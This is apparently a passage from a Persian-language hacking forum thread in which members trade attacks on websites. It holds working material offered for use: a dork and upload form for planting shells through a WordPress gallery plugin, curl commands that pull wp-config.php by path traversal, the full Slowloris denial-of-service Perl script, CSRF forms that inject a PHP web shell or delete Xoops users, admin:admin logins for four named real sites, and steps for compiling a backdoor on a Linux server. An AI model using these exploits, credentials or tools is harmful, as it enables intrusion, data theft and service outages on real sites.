0xDevil

با سلام دوست عزیز این صفحه لاگین که شما الان یوزر و پسورد میدید بهش Cpanel هستش که این یوزر و پسوردش با یوزر پسورد دیتابیس فرق داره . یوزر و پسوردی که شما دارید الان برای خوده cms سایته نه cpanel

Dork Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ patch shell /wp-content/uploads/dreamwork/1_uploadfolder/big/ Html Code <html> <body> <form action="http://http://site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html>

با سلام ممنون از پست خوبتون کانفیگ ها رو توی تایپیک مربوطه بزارید http://www.iran-cyber.net/threads/%D8%AA%D8%A7%D9%BE%DB%8C%DA%A9-%D8%AC%D8%A7%D9%85%D8%B9-%DA%A9%D8%A7%D9%86%D9%81%DB%8C%DA%AF-%D9%87%D8%A7%DB%8C-sentry-mba.2062/

# Exploit Title: Arbitrary file download in Memphis Document Library 3.1.5 # Google Dork: inurl:"mdocs-posts" -site:wordpress.org # Date: 22/03/2016 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://wordpress.org # Software Link: https://downloads.wordpress.org/plugin/memphis-documents-library.3.1.5.zip # Version: 3.1.5 (Vulnerable from 2.3 to 3.1.5, fixed in 3.1.6) # Tested on: Ubuntu 12.04, Wordpress 4.4.2. # CVE : N/A # Vulnerable file: memphis-documents-library/mdocs-downloads.php # Vulnerable function: mdocs_img_preview() # Vulnerable GET parameter: Injectable 'mdocs-img-preview' # Vulnerable line: 90 to 93 # Vulnerable code: 87 function mdocs_img_preview() { 88 require_once(ABSPATH . 'wp-includes/pluggable.php'); 89 $upload_dir = wp_upload_dir(); 90 $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview']; 91 $content = file_get_contents($image); 92 header('Content-Type: image/jpeg'); 93 echo $content; exit(); 94 } # POC: curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php or if the plugin is not installed in the root folder of wordpress, for example in the folder "mdocs-posts": curl http://example.site.com/mdocs-posts/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php

با سلام منم یه فیلم ساختم از این اکسپلویت . wp exp.rar

با سلام اینم یه اسکریپت قوی برای حملات DDOS هستش. دستورRun کردن این اسکریپت : perl slowloris.pl -dns (Victim URL or IP) -options اینم اسکریپت : #!/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print <<EOTEXT; Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris EOTEXT my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); my ( $cache, $httpready, $method, $ssl, $rand, $tcpto ); my $result = GetOptions( 'shost=s' => \$shost, 'dns=s' => \$host, 'httpready' => \$httpready, 'num=i' => \$connections, 'cache' => \$cache, 'port=i' => \$port, 'https' => \$ssl, 'tcpto=i' => \$tcpto, 'test' => \$test, 'timeout=i' => \$timeout, 'version' => \$version, ); if ($version) { print "Version 0.7\n"; exit; } unless ($host) { print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; print "\n\tType 'perldoc $0' for help with options.\n\n"; exit; } unless ($port) { $port = 80; print "Defaulting to port 80.\n"; } unless ($tcpto) { $tcpto = 5; print "Defaulting to a 5 second tcp connection timeout.\n"; } unless ($test) { unless ($timeout) { $timeout = 100; print "Defaulting to a 100 second re-try timeout.\n"; } unless ($connections) { $connections = 1000; print "Defaulting to 1000 connections.\n"; } } my $usemultithreading = 0; if ( $Config{usethreads} ) { print "Multithreading enabled.\n"; $usemultithreading = 1; use threads; use threads::shared; } else { print "No multithreading capabilites found!\n"; print "Slowloris will be slower than normal as a result.\n"; } my $packetcount : shared = 0; my $failed : shared = 0; my $connectioncount : shared = 0; srand() if ($cache); if ($shost) { $sendhost = $shost; } else { $sendhost = $host; } if ($httpready) { $method = "POST"; } else { $method = "GET"; } if ($test) { my @times = ( "2", "30", "90", "240", "500" ); my $totaltime = 0; foreach (@times) { $totaltime = $totaltime + $_; } $totaltime = $totaltime / 60; print "This test could take up to $totaltime minutes.\n"; my $delay = 0; my $working = 0; my $sock; if ($ssl) { if ( $sock = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } else { if ( $sock = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } if ($working) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "GET /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now comes the waiting game...\n"; } else { print "That's odd - I connected but couldn't send the data to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } } else { print "Uhm... I can't connect to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } for ( my $i = 0 ; $i <= $#times ; $i++ ) { print "Trying a $times[$i] second delay: \n"; sleep( $times[$i] ); if ( print $sock "X-a: b\r\n" ) { print "\tWorked.\n"; $delay = $times[$i]; } else { if ( $SIG{__WARN__} ) { $delay = $times[ $i - 1 ]; last; } print "\tFailed after $times[$i] seconds.\n"; } } if ( print $sock "Connection: Close\r\n\r\n" ) { print "Okay that's enough time. Slowloris closed the socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } else { print "Remote server closed socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } if ( $delay < 166 ) { print <<EOSUCKS2BU; Since the timeout ended up being so small ($delay seconds) and it generally takes between 200-500 threads for most servers and assuming any latency at all... you might have trouble using Slowloris against this target. You can tweak the -timeout flag down to less than 10 seconds but it still may not build the sockets in time. EOSUCKS2BU } } else { print "Connecting to $host:$port every $timeout seconds with $connections sockets:\n"; if ($usemultithreading) { domultithreading($connections); } else { doconnections( $connections, $usemultithreading ); } } sub doconnections { my ( $num, $usemultithreading ) = @_; my ( @first, @sock, @working ); my $failedconnections = 0; $working[$_] = 0 foreach ( 1 .. $num ); #initializing $first[$_] = 0 foreach ( 1 .. $num ); #initializing while (1) { $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 0 ) { if ($ssl) { if ( $sock[$z] = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; } else { $working[$z] = 0; } } else { if ( $sock[$z] = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK } else { $working[$z] = 0; } } if ( $working[$z] == 1 ) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "$method /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { print $handle "$primarypayload"; if ( $SIG{__WARN__} ) { $working[$z] = 0; close $handle; $failed++; $failedconnections++; } else { $packetcount++; $working[$z] = 1; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } } print "\t\tSending data.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; if ( print $handle "X-a: b\r\n" ) { $working[$z] = 1; $packetcount++; } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } } print "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; sleep($timeout); } } sub domultithreading { my ($num) = @_; my @thrs; my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; } my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; } } __END__ =head1 TITLE Slowloris by llaera =head1 VERSION Version 1.0 Stable =head1 DATE 02/11/2013 =head1 AUTHOR Laera Loris [email protected] =head1 ABSTRACT Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. =head1 AFFECTS Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...? =head1 NOT AFFECTED IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?

با سلام دسترسی chmod رو روی 755 گذاشتین ؟ اگر تنظیم کردید بازم نتیجه نگرفتید احتمالا اسکریپت مشکل داره ! و از اقا L3gi0n باید کمک بگیرید

Advisory ID: HTB23293[/font][/left] [font=Trebuchet MS] [left]Product: iTop Vendor: Combodo Vulnerable Version(s): 2.2.1 and probably prior Tested Version: 2.2.1 Advisory Publication: February 10, 2016 [without technical details] Vendor Notification: February 10, 2016 Vendor Patch: February 11, 2016 Public Disclosure: March 18, 2016 Vulnerability Type: Cross-Site Request Forgery [CWE-352] Risk Level: High CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via Cross-Site Request Forgery flaw that is also present in the application. The vulnerability exists due to absence of validation of HTTP request origin in "/env-production/itop-config/config.php" script, as well as lack of user-input sanitization received via "new_config" HTTP POST parameter. A remote unauthenticated attacker can perform CSRF attack and execute arbitrary PHP code on the vulnerable system with privileges of the web server. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary system commands on the web server, gain complete access to vulnerable web application and its databases that may contain very sensitive information. The attacker shall create a malicious web page with CSRF exploit code, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and permanently inject malicious PHP code into iTop configuration file. CSRF exploit will inject the following PHP code into iTop configuration file: <? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?> To reproduce the vulnerability, just create an empty HTML file and paste the following CSRF exploit code into it: <form action="http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor" method="post" name="main"> <input type="hidden" name="operation" value="save"> <input type="hidden" name="prev_config" value="1"> <input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>"> <input value="submit" id="btn" type="submit" /> </form> Then login to iTop website with admin account and open the file in your browser. After successful exploitation an attacker can run arbitrary system commands using the "/pages/UI.php" script. This simple PoC will execute "/bin/ls" directory listing command: http://[host]/pages/UI.php?cmd=ls ----------------------------------------------------------------------------------------------- Solution: Replace the file datamodels/2.x/itop-config/config.php by the version from the appropriate revision from SVN, then run the setup again. More Information: https://sourceforge.net/p/itop/tickets/1202/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23293 - https://www.htbridge.com/advisory/HTB23293 - RCE via CSRF in iTop [2] iTop - http://www.combodo.com - iTop: open source ITIL ITSM Software. [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. https://packetstormsecurity.com/files/136297/itop-xsrf.txt

Xoops 2.5.7.2 Directory Traversal Bypass CSRF Arbitrary User Deletions Vulnerabilities Vendor: ============= xoops.org Product: ================ Xoops 2.5.7.2 Vulnerability Type: =========================== Xoops 2.5.7.2 Directory Traversal Bypass / CSRF - Arbitrary User Deletions Vulnerabilities Vulnerability Details: ===================== Xoops 2.5.7.2 has checks to defend against directory traversal attacks. However, they can be easily bypassed by simply issuing "..././" instead of "../" References: http://xoops.org/modules/news/article.php?storyid=6757 Exploit Codes: ============== In Xoops code in 'protector.php' the following check is made for dot dot slash "../" in HTTP requests ///////////////////////////////////////////////////////////////////////////////// if( is_array( $_GET[ $key ] ) ) continue ; if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) { $this->last_error_type = 'DirTraversal' ; $this->message .= "Directory Traversal '$val' found.\n" ; //////////////////////////////////////////////////////////////////////////////// The above Xoops directory traversal check can be defeated by using ..././..././..././..././ you can test the theory by using example below test case by supplying ..././ to GET param. $val=$_GET['c']; if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) ) { echo "traversal!"; }else{ echo "ok!" . $val; } Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL users from the Xoops database. References: http://xoops.org/modules/news/article.php?storyid=6757 Exploit Codes: ============= Following CSRF attack delete all users from database, following POC code will sequentially delete 100 users from the Xoops application. <iframe name="ifrm" style="display:none" name="hidden-form"></iframe> <form target="ifrm" name='memberslist' id='CSRF' action='http://localhost/xoops-2.5.7.2/htdocs/modules/system/admin.php?fct=users' method='POST'> <input type="hidden" id="ids" name="memberslist_id[]" /> <input type="hidden" name="fct" value="users" /> <input type="hidden" name="edit_group" value="" /> <input type="hidden" name="selgroups" value="" /> <input type="hidden" name="op" value="users_add_delete_group" /> <input type="hidden" name="op" value="action_group" /> <input type="hidden" name="Submit" value="Submit+Query" /> </form> <script> var c=-1 var amttodelete=100 var id=document.getElementById("ids") var frm=document.getElementById("CSRF") function doit(){ c++ arguments[1].value=c arguments[0].submit() if(c>=amttodelete){ clearInterval(si) alert("Done!") } } var si=setInterval(doit, 1000, frm, id) </script> http://0day.today/exploit/25086

Us:admin Pas:admin Host:http://sonopsolar.co.za/wp-admin

Us:admin pas:admin Host:http://1worldtravelgroup.co.za/wp-admin

Us:admin Pas:admin Host:http://forkmax.com/wp-admin

Us:admin pas:admin Host:http://www.sethscouriers.co.za/wp-admin ما رو هم فراموش نکنید دوستان

با سلام اموزش بک دور از سرور لینوکس ابتدا فایل Loc.c روی سرور اپلود کنید و دستور زیر از سرور بکدور بگیرید . gcc -fno-stack-protector -z execstack filename.c -o filename loc.rar